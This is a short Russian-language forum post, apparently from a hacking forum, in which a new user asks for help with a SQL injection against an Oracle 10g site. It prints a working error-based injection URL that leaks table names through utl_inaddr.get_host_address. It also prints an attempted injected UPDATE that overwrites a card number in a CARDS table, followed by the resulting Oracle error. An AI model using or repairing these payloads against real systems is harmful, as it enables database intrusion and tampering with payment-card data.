13.05.2011, 19:25
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 1
Провел на форуме:
14740
Репутация:
0
|
|
HEEEEEEEEEELP!!
Есть oracle 10g sql injection вида:
Сообщение от None
http://site.com/index.php?mod=news')+or+1=utl_inaddr.get_host_addr ess((select+table_name+from+sys.user_tables+where+ rownum=1))--+
Можно ли как нибудь изменить значение в базе данных?
Например пробую так:
Сообщение от None
http://site.com/index.php?mod=news')+and+(update+CARDS+set+CARD_NU MBER='5454908770100000'+where+rownum=1)+from+dual--+
Выдает ошибку:
Сообщение от None
Ошибка исполнения запроса : ORA-00936: отсутствует выражение
Помогите плз! |
|
|